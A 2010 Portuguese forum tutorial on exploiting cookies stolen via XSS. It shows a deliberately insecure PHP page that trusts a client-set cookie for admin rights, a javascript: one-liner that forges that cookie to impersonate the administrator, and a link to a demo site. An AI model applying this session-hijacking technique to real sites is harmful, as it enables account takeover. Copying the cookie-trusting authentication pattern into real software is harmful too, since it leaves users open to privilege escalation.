Tutorial O que fazer com os cookies do xss ??

Started by samukt, 12 de January , 2010, 04:37:04 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

samukt

12 de January , 2010, 04:37:04 PM
Quem nunca se perguntou o que fazer depois de receber os cookies do Xss?
Aqui vai um Tutorial.


Código da página:
Code Select
   <?php
    if ($_COOKIE["21232f297a57a5a743894a0e4a801fc3"] == "1"){
    echo "admin";}
    else {
    echo "usuario";
    }
    ?>

Nos estamos logados como Usuario comum, depois de fazer o Cross Site Script com o admin, nos retornou o seguinte cookie:



Ao digitar no nosso navegador javascript:alert(document.cookie) aparece uma mensagem em branco:
Ou seja, nosso cookie não tem privilégios, se mudarmos para o do admin então os consiguiremos.

Para injetar o cookie do administrador use o código:

javascript:void(document.cookie= "21232f297a57a5a743894a0e4a801fc3 = 1");

Resultado:
Nosso cookie esta igual o do admin, para o sistema nós somos ele, por isso conseguimos os privilégios.

Para testar esse tutorial use o site: http://ronaldobrilhanocorintia.6te.net/index2.php

Fonte: http://www.inw-seguranca.com
Autor: $4mu:kt
Print
Go Up Pages1
User actions